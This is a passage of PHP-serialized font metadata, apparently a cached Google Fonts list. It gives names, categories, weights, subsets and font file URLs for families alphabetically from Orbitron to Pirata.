ogleapis.com/css?family=Orbitron:700";i:900;s:52:"https://fonts.googleapis.com/css?family=Orbitron:900";}}s:7:"oregano";a:7:{s:4:"name";s:7:"Oregano";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/oregano/v4/UiLhqNixVv2EpjRoBG6axA.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/oregano/v4/_iwqGEht6XsAuEaCbYG64Q.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Oregano:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Oregano:italic";}}s:7:"orienta";a:7:{s:4:"name";s:7:"Orienta";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/orienta/v4/_NKSk93mMs0xsqtfjCsB3Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Orienta:regular";}}s:15:"original_surfer";a:7:{s:4:"name";s:15:"Original Surfer";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/originalsurfer/v5/gdHw6HpSIN4D6Xt7pi1-qIkEz33TDwAZczo_6fY7eg0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Original+Surfer:regular";}}s:6:"oswald";a:7:{s:4:"name";s:6:"Oswald";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{i:300;s:64:"http://fonts.gstatic.com/s/oswald/v11/y3tZpCdiRD4oNRRYFcAR5Q.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/oswald/v11/uLEd2g2vJglLPfsBF91DCg.ttf";i:700;s:64:"http://fonts.gstatic.com/s/oswald/v11/7wj8ldV_5Ti37rHa0m1DDw.ttf";}s:4:"urls";a:3:{i:300;s:50:"https://fonts.googleapis.com/css?family=Oswald:300";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Oswald:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Oswald:700";}}s:16:"over_the_rainbow";a:7:{s:4:"name";s:16:"Over the Rainbow";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/overtherainbow/v7/6gp-gkpI2kie2dHQQLM2jQBdxkZd83xOSx-PAQ2QmiI.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Over+the+Rainbow:regular";}}s:8:"overlock";a:7:{s:4:"name";s:8:"Overlock";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";i:4;s:3:"900";i:5;s:9:"900italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:6:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/overlock/v5/Z8oYsGi88-E1cUB8YBFMAg.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/overlock/v5/rq6EacukHROOBrFrK_zF6_esZW2xOQ-xsNqO47m55DA.ttf";i:700;s:86:"http://fonts.gstatic.com/s/overlock/v5/Fexr8SqXM8Bm_gEVUA7AKaCWcynf_cDxXwCLxiixG1c.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/overlock/v5/wFWnYgeXKYBks6gEUwYnfAJKKGfqHaYFsRG-T3ceEVo.ttf";i:900;s:86:"http://fonts.gstatic.com/s/overlock/v5/YPJCVTT8ZbG3899l_-KIGqCWcynf_cDxXwCLxiixG1c.ttf";s:9:"900italic";s:86:"http://fonts.gstatic.com/s/overlock/v5/iOZhxT2zlg7W5ij_lb-oDp0EAVxt0G0biEntp43Qt6E.ttf";}s:4:"urls";a:6:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Overlock:regular";s:6:"italic";s:55:"https://fonts.googleapis.com/css?family=Overlock:italic";i:700;s:52:"https://fonts.googleapis.com/css?family=Overlock:700";s:9:"700italic";s:58:"https://fonts.googleapis.com/css?family=Overlock:700italic";i:900;s:52:"https://fonts.googleapis.com/css?family=Overlock:900";s:9:"900italic";s:58:"https://fonts.googleapis.com/css?family=Overlock:900italic";}}s:11:"overlock_sc";a:7:{s:4:"name";s:11:"Overlock SC";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/overlocksc/v5/8D7HYDsvS_g1GhBnlHzgzaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Overlock+SC:regular";}}s:3:"ovo";a:7:{s:4:"name";s:3:"Ovo";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:60:"http://fonts.gstatic.com/s/ovo/v7/mFg27dimu3s9t09qjCwB1g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:51:"https://fonts.googleapis.com/css?family=Ovo:regular";}}s:6:"oxygen";a:7:{s:4:"name";s:6:"Oxygen";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{i:300;s:63:"http://fonts.gstatic.com/s/oxygen/v5/lZ31r0bR1Bzt_DfGZu1S8A.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/oxygen/v5/uhoyAE7XlQL22abzQieHjw.ttf";i:700;s:63:"http://fonts.gstatic.com/s/oxygen/v5/yLqkmDwuNtt5pSqsJmhyrg.ttf";}s:4:"urls";a:3:{i:300;s:50:"https://fonts.googleapis.com/css?family=Oxygen:300";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Oxygen:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Oxygen:700";}}s:11:"oxygen_mono";a:7:{s:4:"name";s:11:"Oxygen Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/oxygenmono/v4/DigTu7k4b7OmM8ubt1Qza6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Oxygen+Mono:regular";}}s:7:"pt_mono";a:7:{s:4:"name";s:7:"PT Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/ptmono/v4/QUbM8H9yJK5NhpQ0REO6Wg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=PT+Mono:regular";}}s:7:"pt_sans";a:7:{s:4:"name";s:7:"PT Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/ptsans/v8/UFoEz2uiuMypUGZL1NKoeg.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/ptsans/v8/yls9EYWOd496wiu7qzfgNg.ttf";i:700;s:84:"http://fonts.gstatic.com/s/ptsans/v8/F51BEgHuR0tYHxF0bD4vwvesZW2xOQ-xsNqO47m55DA.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/ptsans/v8/lILlYDvubYemzYzN7GbLkC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=PT+Sans:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=PT+Sans:italic";i:700;s:51:"https://fonts.googleapis.com/css?family=PT+Sans:700";s:9:"700italic";s:57:"https://fonts.googleapis.com/css?family=PT+Sans:700italic";}}s:15:"pt_sans_caption";a:7:{s:4:"name";s:15:"PT Sans Caption";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:2:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/ptsanscaption/v9/OXYTDOzBcXU8MTNBvBHeSW8by34Z3mUMtM-o4y-SHCY.ttf";i:700;s:91:"http://fonts.gstatic.com/s/ptsanscaption/v9/Q-gJrFokeE7JydPpxASt25tc0eyfI4QDEsobEEpk_hA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=PT+Sans+Caption:regular";i:700;s:59:"https://fonts.googleapis.com/css?family=PT+Sans+Caption:700";}}s:14:"pt_sans_narrow";a:7:{s:4:"name";s:14:"PT Sans Narrow";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:2:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/ptsansnarrow/v7/UyYrYy3ltEffJV9QueSi4ZTvAuddT2xDMbdz0mdLyZY.ttf";i:700;s:90:"http://fonts.gstatic.com/s/ptsansnarrow/v7/Q_pTky3Sc3ubRibGToTAYsLtdzs3iyjn_YuT226ZsLU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=PT+Sans+Narrow:regular";i:700;s:58:"https://fonts.googleapis.com/css?family=PT+Sans+Narrow:700";}}s:8:"pt_serif";a:7:{s:4:"name";s:8:"PT Serif";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/ptserif/v8/sAo427rn3-QL9sWCbMZXhA.ttf";s:6:"italic";s:85:"http://fonts.gstatic.com/s/ptserif/v8/9khWhKzhpkH0OkNnBKS3n_esZW2xOQ-xsNqO47m55DA.ttf";i:700;s:85:"http://fonts.gstatic.com/s/ptserif/v8/kyZw18tqQ5if-_wpmxxOeKCWcynf_cDxXwCLxiixG1c.ttf";s:9:"700italic";s:85:"http://fonts.gstatic.com/s/ptserif/v8/Foydq9xJp--nfYIx2TBz9QJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:4:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=PT+Serif:regular";s:6:"italic";s:55:"https://fonts.googleapis.com/css?family=PT+Serif:italic";i:700;s:52:"https://fonts.googleapis.com/css?family=PT+Serif:700";s:9:"700italic";s:58:"https://fonts.googleapis.com/css?family=PT+Serif:700italic";}}s:16:"pt_serif_caption";a:7:{s:4:"name";s:16:"PT Serif Caption";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:2:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/ptserifcaption/v8/7xkFOeTxxO1GMC1suOUYWVsRioCqs5fohhaYel24W3k.ttf";s:6:"italic";s:92:"http://fonts.gstatic.com/s/ptserifcaption/v8/0kfPsmrmTSgiec7u_Wa0DB1mqvzPHelJwRcF_s_EUM0.ttf";}s:4:"urls";a:2:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=PT+Serif+Caption:regular";s:6:"italic";s:63:"https://fonts.googleapis.com/css?family=PT+Serif+Caption:italic";}}s:8:"pacifico";a:7:{s:4:"name";s:8:"Pacifico";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/pacifico/v7/GIrpeRY1r5CzbfL8r182lw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Pacifico:regular";}}s:9:"palanquin";a:7:{s:4:"name";s:9:"Palanquin";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"100";i:1;s:3:"200";i:2;s:3:"300";i:3;s:7:"regular";i:4;s:3:"500";i:5;s:3:"600";i:6;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:7:{i:100;s:87:"http://fonts.gstatic.com/s/palanquin/v1/Hu0eGDVGK_g4saUFu6AK3KCWcynf_cDxXwCLxiixG1c.ttf";i:200;s:87:"http://fonts.gstatic.com/s/palanquin/v1/pqXYXD7-VI5ezTjeqQOcyC3USBnSvpkopQaUR-2r7iU.ttf";i:300;s:87:"http://fonts.gstatic.com/s/palanquin/v1/c0-J5OCAagpFCKkKraz-Ey3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/palanquin/v1/xCwBUoAEV0kzCDwerAZ0Aw.ttf";i:500;s:87:"http://fonts.gstatic.com/s/palanquin/v1/wLvvkEcZMKy95afLWh2EfC3USBnSvpkopQaUR-2r7iU.ttf";i:600;s:87:"http://fonts.gstatic.com/s/palanquin/v1/405UIAv95_yZkCECrH6y-i3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:87:"http://fonts.gstatic.com/s/palanquin/v1/-UtkePo3NFvxEN3rGCtTvi3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:7:{i:100;s:53:"https://fonts.googleapis.com/css?family=Palanquin:100";i:200;s:53:"https://fonts.googleapis.com/css?family=Palanquin:200";i:300;s:53:"https://fonts.googleapis.com/css?family=Palanquin:300";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Palanquin:regular";i:500;s:53:"https://fonts.googleapis.com/css?family=Palanquin:500";i:600;s:53:"https://fonts.googleapis.com/css?family=Palanquin:600";i:700;s:53:"https://fonts.googleapis.com/css?family=Palanquin:700";}}s:14:"palanquin_dark";a:7:{s:4:"name";s:14:"Palanquin Dark";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"600";i:3;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:4:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/palanquindark/v1/PamTqrrgbBh_M3702w39rOfChn3JSg5yz_Q_xmrKQN0.ttf";i:500;s:91:"http://fonts.gstatic.com/s/palanquindark/v1/iXyBGf5UbFUu6BG8hOY-maMZTo-EwKMRQt3RWHocLi0.ttf";i:600;s:91:"http://fonts.gstatic.com/s/palanquindark/v1/iXyBGf5UbFUu6BG8hOY-mVNxaunw8i4Gywrk2SigRnk.ttf";i:700;s:91:"http://fonts.gstatic.com/s/palanquindark/v1/iXyBGf5UbFUu6BG8hOY-mWToair6W0TEE44XrlfKbiM.ttf";}s:4:"urls";a:4:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Palanquin+Dark:regular";i:500;s:58:"https://fonts.googleapis.com/css?family=Palanquin+Dark:500";i:600;s:58:"https://fonts.googleapis.com/css?family=Palanquin+Dark:600";i:700;s:58:"https://fonts.googleapis.com/css?family=Palanquin+Dark:700";}}s:7:"paprika";a:7:{s:4:"name";s:7:"Paprika";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/paprika/v4/b-VpyoRSieBdB5BPJVF8HQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Paprika:regular";}}s:10:"parisienne";a:7:{s:4:"name";s:10:"Parisienne";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/parisienne/v4/TW74B5QISJNx9moxGlmJfvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Parisienne:regular";}}s:11:"passero_one";a:7:{s:4:"name";s:11:"Passero One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/passeroone/v8/Yc-7nH5deCCv9Ed0MMnAQqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Passero+One:regular";}}s:11:"passion_one";a:7:{s:4:"name";s:11:"Passion One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:3:"700";i:2;s:3:"900";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/passionone/v6/1UIK1tg3bKJ4J3o35M4heqCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:88:"http://fonts.gstatic.com/s/passionone/v6/feOcYDy2R-f3Ysy72PYJ2ne1Pd76Vl7zRpE7NLJQ7XU.ttf";i:900;s:88:"http://fonts.gstatic.com/s/passionone/v6/feOcYDy2R-f3Ysy72PYJ2ienaqEuufTBk9XMKnKmgDA.ttf";}s:4:"urls";a:3:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Passion+One:regular";i:700;s:55:"https://fonts.googleapis.com/css?family=Passion+One:700";i:900;s:55:"https://fonts.googleapis.com/css?family=Passion+One:900";}}s:18:"pathway_gothic_one";a:7:{s:4:"name";s:18:"Pathway Gothic One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/pathwaygothicone/v4/Lqv9ztoTUV8Q0FmQZzPqaA6A6xIYD7vYcYDop1i-K-c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Pathway+Gothic+One:regular";}}s:12:"patrick_hand";a:7:{s:4:"name";s:12:"Patrick Hand";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/patrickhand/v10/9BG3JJgt_HlF3NpEUehL0C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Patrick+Hand:regular";}}s:15:"patrick_hand_sc";a:7:{s:4:"name";s:15:"Patrick Hand SC";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/patrickhandsc/v4/OYFWCgfCR-7uHIovjUZXsbAgSRh1LpJXlLfl8IbsmHg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Patrick+Hand+SC:regular";}}s:7:"pattaya";a:7:{s:4:"name";s:7:"Pattaya";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:5:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";i:4;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/pattaya/v1/sJEout1xdD7J8H-1H81pIQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Pattaya:regular";}}s:9:"patua_one";a:7:{s:4:"name";s:9:"Patua One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/patuaone/v6/njZwotTYjswR4qdhsW-kJw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Patua+One:regular";}}s:7:"pavanam";a:7:{s:4:"name";s:7:"Pavanam";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:5:"tamil";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/pavanam/v1/C7yuEhNK5oftNLSL3I0bGw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Pavanam:regular";}}s:11:"paytone_one";a:7:{s:4:"name";s:11:"Paytone One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/paytoneone/v8/3WCxC7JAJjQHQVoIE0ZwvqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Paytone+One:regular";}}s:7:"peddana";a:7:{s:4:"name";s:7:"Peddana";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/peddana/v4/zaSZuj_GhmC8AOTugOROnA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Peddana:regular";}}s:7:"peralta";a:7:{s:4:"name";s:7:"Peralta";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/peralta/v4/cTJX5KEuc0GKRU9NXSm-8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Peralta:regular";}}s:16:"permanent_marker";a:7:{s:4:"name";s:16:"Permanent Marker";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/permanentmarker/v5/9vYsg5VgPHKK8SXYbf3sMol14xj5tdg9OHF8w4E7StQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Permanent+Marker:regular";}}s:19:"petit_formal_script";a:7:{s:4:"name";s:19:"Petit Formal Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/petitformalscript/v4/OEZwr2-ovBsq2n3ACCKoEvVPl2Gjtxj0D6F7QLy1VQc.ttf";}s:4:"urls";a:1:{s:7:"regular";s:67:"https://fonts.googleapis.com/css?family=Petit+Formal+Script:regular";}}s:7:"petrona";a:7:{s:4:"name";s:7:"Petrona";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/petrona/v5/nnQwxlP6dhrGovYEFtemTg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Petrona:regular";}}s:11:"philosopher";a:7:{s:4:"name";s:11:"Philosopher";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/philosopher/v7/oZLTrB9jmJsyV0u_T0TKEaCWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:89:"http://fonts.gstatic.com/s/philosopher/v7/_9Hnc_gz9k7Qq6uKaeHKmUeOrDcLawS7-ssYqLr2Xp4.ttf";i:700;s:89:"http://fonts.gstatic.com/s/philosopher/v7/napvkewXG9Gqby5vwGHICHe1Pd76Vl7zRpE7NLJQ7XU.ttf";s:9:"700italic";s:89:"http://fonts.gstatic.com/s/philosopher/v7/PuKlryTcvTj7-qZWfLCFIM_zJjSACmk0BRPxQqhnNLU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Philosopher:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Philosopher:italic";i:700;s:55:"https://fonts.googleapis.com/css?family=Philosopher:700";s:9:"700italic";s:61:"https://fonts.googleapis.com/css?family=Philosopher:700italic";}}s:6:"piedra";a:7:{s:4:"name";s:6:"Piedra";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/piedra/v5/owf-AvEEyAj9LJ2tVZ_3Mw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Piedra:regular";}}s:13:"pinyon_script";a:7:{s:4:"name";s:13:"Pinyon Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/pinyonscript/v6/TzghnhfCn7TuE73f-CBQ0CeUSrabuTpOsMEiRLtKwk0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Pinyon+Script:regular";}}s:10:"pirata_one";a:7:{s:4:"name";s:10:"Pirata 